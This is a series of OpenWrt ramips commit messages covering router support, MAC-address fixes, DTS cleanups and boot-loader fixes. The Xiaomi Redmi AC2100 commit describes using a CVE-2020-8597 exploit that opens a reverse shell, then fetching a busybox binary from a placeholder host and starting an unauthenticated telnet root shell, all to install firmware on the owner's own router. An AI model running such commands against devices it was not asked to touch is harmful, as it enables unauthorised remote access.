Specifications:
- MT7628NN @ 580 MHz
- 32 MB RAM
- 8 MB Flash
- 5x 10/100 Mbps Ethernet (built-in switch)
- 2.4 GHz WLAN
- 2x external, non-detachable antennas (1x for RT-N10P V3)
Flash instructions:
1. Set PC network interface to 192.168.1.75/24.
2. Connect PC to the router via LAN.
3. Turn router off, press and hold reset button, then turn it on.
4. Keep the button pressed till power led starts to blink.
5. Upload the firmware file via TFTP. (Any filename is accepted.)
6. Wait until the router reboots.
Signed-off-by: Ernst Spielmann <endspiel@disroot.org>
[fix node/property name for state_default]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Commit f761f4052c had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.
Fixes: f761f4052c ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
Olimex RT5350F-OLinuXino devices do not have a default MAC address, and there is
nothing at the 0x4 offset in the factory partition. Using a local address, which
is randomly generated by the kernel, would be a better choice.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
of_get_mac_address can return ERR_PTR since 5.2, so the return pointer should be
checked before used. Otherwise it might cause an oops during boot.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
This is additional fix of c998ae7f0e.
The sysupgrade image of I-O DATA MT7621 devices manufactured by MSTC
(MitraStar Technology Corp.) faced to the booting issue. This was caused
by imcomplete extraction of large kernel image by U-Boot, and this issue
is occurred in initramfs image after fixing of sysupgrade image.
So, use lzma-loader for initramfs image to fix the issue.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
Co-developed-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Tested-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [wn-ax2033gr]
ramips images now relies on explicit switch setup for proper failsafe
functionality. Remove default cases where it relies on vlan setup in
dts and add switch setup for devices affected.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
The location 0x28 in factory partition is the common one used for
ethernet address on this architecture. Despite, it contains the label
MAC address for the devices at hand.
Consequently, this patch moves 0x28 to the ðernet node in DTS files
(setting the WAN MAC address there) and sets up the lan_mac from 0x22
in 02_network. As a benefit, this allows to use label-mac-device in
DTS instead of ucidef_set_label_macaddr.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Like for the RT-AC54U, this uses a DT trigger for WiFi also at the
RT-AC51U. While at it, rename node and label to wifi2g.
Note that the 5g WiFi LED still isn't supported (see PR #3017 for
further details: https://github.com/openwrt/openwrt/pull/3017 )
Tested-by: Davide Fioravanti <pantanastyle@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The current MAC address assignment for the ASUS RT-AC51U is "wrong",
it actually should be the same as for the RT-AC54U. Fix it.
MAC assignment based on vendor firmware:
2g 0x4 label
5g 0x8004 label +4
lan 0x22 label +4
wan 0x28 label
Thanks to Davide Fioravanti for checking this on his device.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The version inside the compat file determines, if a firmware supports
a specific device. I have not yet fully understood, how this is checked,
but it only seems to indicate which devices are supported by a specific
version of the combined vendor firmware. Devices assume that subsequent
versions, starting with the version that initially added support for a
specific device, are always compatible.
The first compat version that added support for the EP-R6 was '21001:7',
but OpenWrt did use '21001:6' before. This is why the factory image could
not be flashed using the vendor software, but only using TFTP.
The compat version has been bumped by the vendor a few times, but more
devices have been added since (e.g. ER-10X). Because OpenWrt currently
only supports the ER-X, ER-X-SFP and EP-R6, the compat version is
incremented to the version that first supported the EP-R6, which is
'21001:7'.
This allows the factory image to be flashed on EP-R6 without TFTP.
Signed-off-by: Fabian Bläse <fabian@blaese.de>
This increases the SPI frequency for both ASUS RT-AC51U and RT-AC54U.
Speed comparison tests have been performed on RT-AC54U:
- 10Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 4m 37.78s
user 0m 0.02s
sys 2m 43.92s
- 50Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 28.34s
user 0m 0.03s
sys 0m 46.96s
- 50Mhz fast read
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 11.94s
user 0m 0.01s
sys 0m 46.94s
- 80Mhz
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 12.31s
user 0m 0.04s
sys 0m 46.96s
- 80Mhz fast read
root@OpenWrt:~# time cat /dev/mtd* > /dev/null
real 1m 12.15s
user 0m 0.02s
sys 0m 46.97s
Based on that, we took 50 MHz with fast-read, as higher frequencies
didn't yield further improvements.
For the RT-AC51U, only the final configuration was tested.
Tested-by: Zhijun You <hujy652@gmail.com> [RT-AC54U]
Tested-by: Davide Fioravanti <pantanastyle@gmail.com> [RT-AC51U]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
netis WF2770 is a 2.4/5GHz band AC750 router, based on MediaTek MT7620A.
Specifications:
- SoC: MT7620A
- RAM: DDR2 64MB
- Flash: SPI NOR 16MB
- WiFi:
- 2.4GHz: SoC internal
- 5GHz: MT7610EN
- Ethernet: 5x 10/100/1000Mbps
- Switch: MT7530BU
- UART:
- J2: 3.3V, RX, TX, GND (3.3V is the square pad) / 57600 8N1
MAC addresses in factory partition:
0x0004: LAN, WiFi 2.4GHz (label_mac-6)
0x0028: not used (label_mac-1)
0x002e: WAN (label_mac)
0x8004: WiFi 5GHz (label_mac+2)
Installation via web interface:
1. Flash **initramfs** image through the stock web interface.
2. Boot into OpenWrt and perform sysupgrade with sysupgrade image.
Revert to stock firmware:
1. Perform sysupgrade with stock image.
Reviewed-by: Pawel Dembicki <paweldembicki@gmail.com>
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Specification:
- CPU: MTK MT7620A
- RAM: 64MB
- ROM: 16MB SPI Flash Macronix MX25L12835E
- WiFi1: MediaTek MT7620A
- WiFi2: MediaTek MT7612E
- Button: reset, wps
- LED: 9 LEDs:Power, WiFi 2.4G,WiFi 5G, USB, LAN1, LAN2, LAN3, LAN4, WAN
- Ethernet: 5 ports, 4 LAN + 1 WAN
- Other: 1x UART 1x USB2.0
Installation:
Update using ASUS Firmware Restoration Tool:
1. Download the ASUS Firmware Restoration Tool but don't open it yet
2. Unplug your computer from the router
3. Put the router into Rescue Mode by: turning the power off, using a pin
to press and hold the reset button, then turning the router back on while
keeping the reset button pressed for ~5 secs until the power LED starts
flashing slowly (which indicates the router has entered Rescue Mode)
4. Important (if you don't do this next step the Asus Firmware
Restoration Tool will wrongly assume that the router is not in Rescue Mode
and will refuse to flash it): go to the Windows Control Panel and
temporarily disable ALL other network adapters except the one you will use
to connect your computer to the router
5. For the single adapter you left enabled, temporarily give it the
static IP 192.168.1.10 and the subnet mask 255.255.255.0
6. Connect a LAN cable between your computer (make sure to use the
Ethernet port of the adapter you've just set up) and port 1 of the router
(not the router's WAN port)
7. Rename sysupgrade.bin to factory.trx
8. Open the Asus Firmware Restoration Tool, locate factory.trx and click
upload (if Windows shows a compatibility prompt, confirm that the tool worked fine)
9. Flashing and reboot is finished when the power LED stops blinking and
stays on
MAC assignment based on vendor firmware:
2g 0x4 label
5g 0x8004 label +4
lan 0x22 label +4
wan 0x28 label
Signed-off-by: Zhijun You <hujy652@gmail.com>
[rebased due to DTSI patch, minor commit message adjustments, fix
label MAC address (lan->wan), do spi frequency increase separately]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This creates a DTSI for the ASUS RT-AC51U and the upcoming RT-AC54U,
as they are quite similar.
White at it, drop the unneeded "status = okay" for ethernet.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The property "ralink,port-map" has been obsolete long before
this device was added, and the device is a one-port anyway.
Just remove it.
Fixes: 5ef79af4f8 ("ramips: add support for Ravpower WD03")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This tidies up the ethernet node in mt7620 DTS files by:
- removing unnecessary status as it is not disabled
- reordering properties consistently
- adding empty lines to enhance readability
This should make comparison and reviewing new PRs based on C/P easier.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The BL-W1200 Wireless Router is based on the MT7620A SoC.
Specification:
- MediaTek MT7620A (580 Mhz)
- 64 MB of RAM
- 8 MB of FLASH
- 1x 802.11bgn radio
- 1x 802.11ac radio (MT7612E)
- 5x 10/100/1000 Mbps Ethernet (MT7530)
- 2x external, non-detachable antennas (Wifi 2.4G/5G)
- 1x USB 2.0
- UART (R2) on PCB (57600 8n1)
- 9x LED (1 GPIO controlled), 1x button
- u-Boot bootloader
Known issues:
- No status LED. Used WPS LED during boot/failsafe/sysupgrade.
Installation:
1. Apply initramfs image via factory web-gui.
2. Install sysupgrade image.
How to revert to OEM firmware:
- sysupgrade -n -F stock_firmware.bin
Reviewed-by: Sungbo Eo <mans0n@gorani.run>
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Most work was done in commit 021c893658 ("ramips: fix size-cells on spi
nodes"), but a few more DTS files using the old reg style have been added
since then. This commit fixes them.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
- use tab indent in image build recipes for consistency
- harmonize line wrapping
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
[use different line wrapping for one recipe]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
As the node is already defined and labeled in SoC DTSI file, we can refer to it
outside of root node and reduce redundancy.
While at it, remove unused pcf8563 label.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Change "0" to "0x0" for consistency. This is an extension of commit 34abfb6e91
("ramips: convert mediatek,mtd-eeprom from decimal to hex notation").
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
As evidenced here[1] the device MAC address can be stored at a random
offset in the hard_config partition. Rely on sysfs to update the MAC
address correctly.
Adjust config so that WAN is base MAC and LAN is base MAC +1 to better
match label and vendor OS.
[1] https://github.com/openwrt/openwrt/pull/2850#issuecomment-610809021
Signed-off-by: Thibaut VARÈNE <hacks@slashdirt.org>
This reverts commit a1693bf626.
The rt288x and rt3883 devices in question don't have switches.
Only keep the merged case for rt305x.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
According to a user in OpenWrt forum, on RouterOS the MAC addresses are
ether1(WAN) = MAC
ether2(LAN2) = MAC+1
ether3(LAN3) = MAC+2
etc.
Fix the MAC addresses in OpenWrt.
Ref: https://forum.openwrt.org/t/few-dumb-question-about-mt7530-rb750gr3-dsa/61608
Signed-off-by: DENG Qingfang <dengqf6@mail2.sysu.edu.cn>
[remove label_mac in 02_network]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
In rt3883 subtarget, several devices add swconfig to their DEVICE_PACKAGES.
This is redundant as the package is already provided via DEFAULT_PACKAGES.
Remove the redundant inclusions.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
These definitions are not required since swconfig is selected for
the target anyway and kmod-swconfig is pulled as dependency by
kmod-switch-rtl8366rb.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Commit 8f6334eb94 ("ramips: explicitly disable built-in switch when needed")
did not fix rt288x and rt3883 devices. This patch deals with them.
While at it, consolidate duplicate cases in interface setup.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Three of the I-O DATA devices with NAND flash share a lot of
variables. Create a common definition for them to reduce duplicate
code.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The official sysupgrade images for I-O DATA devices manufactured by
MSTC (MitraStar Technology Corp.) cannot be booted normally and the
kernel panics after switching to kernel 5.4.
This commit fixes the issue by using lzma-loader.
Note:
These devices use Z-LOADER to read the kernel from NAND flash and boot
it. Z-LOADER cannot load and start plain lzma-loader, so additional
lzma-compression is needed.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
Co-developed-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Tested-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [wn-ax2033gr]
In several Japanese routers with MT7621 SoC, the official sysupgrade
image cannot be booted properly after switching to kernel 5.4.
This commit fixes the issue by using lzma-loader.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
This device has trouble extracting big kernel from flash,
and supports LZMA compressed kernels only.
Using OpenWrt kernel loader saves us 64 KB compared to the dictionary
size limiting workaround.
Factory image sizes (commit: 5f126c541a) with "CONFIG_ALL_KMODS=y":
- original ("-d23", default): 4784188 bytes, LZMA ERROR 1
- with "-d19": 4915260, LZMA ERROR 1
- with "-d18": 4915260, diff to original: +128 KB
- with "-d17": 4980796, diff to original: +192 KB
- with this patch: 4849724, diff to original: +64 KB
To save some CPU cycle, use minimal compression ("-a0") for the LZMA
compressed uImage.
The most robust solution would use a different loader,
which reads the compressed kernel directly from the flash.
See the thread at [0] for more details!
[0] http://lists.infradead.org/pipermail/openwrt-devel/2020-April/022926.html
Signed-off-by: Szabolcs Hubai <szab.hu@gmail.com>
Tested-by: Stijn Segers <foss@volatilesystems.org>
[fixed identation]
Signed-off-by: David Bauer <mail@david-bauer.net>
kmod-usb-dwc2 and kmod-usb-ledtrig-usbport are not target default packages, and
Belkin F7C027 does not have a USB port anyway. Just drop it.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Currently SUPPORTED_DEVICES only contains the old device string. Fix it by
removing the first assignment.
Fixes: c2334ad60d ("ramips/mt76x8: Synchronize Makefiles with DTS compatible")
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
SFP cage of this device is connected via a AT8031 phy to port 5 of the switch.
This phy act as a RGMII-to-SerDes converter.
Also a I2C clock gate needs to be enabled in order to access the SFP module via I2C bus.
SFP cage also has module detect pin which is connected to I2C gpio expander.
With this patch the kernel/PHYLINK now can detect, readout and use the SFP module/port.
NOTE: SFP cage / AT8033 PHY only support 1000base-X encoding!
This means that some SGMII modules can work and only at forced 1GBit/full-duplex!
Signed-off-by: René van Dorst <opensource@vdorst.com>
mt7621 and mt76x8 subtargets have been moved to kernel 5.4 and their
DTS(I) files are incompatible to kernel 4.14.
Remove the corresponding kernel config files to signal that more
boldly and to prevent accidentally patching the wrong kernel when
pulling in older config patches.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Netgear R7200 is another clone of Netgear R6700v2, introduced in:
6e80df5 ("ramips: add support for NETGEAR R6700v2/AC2400")
Reported-by: Joel Pinsker, github user @joelp64
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>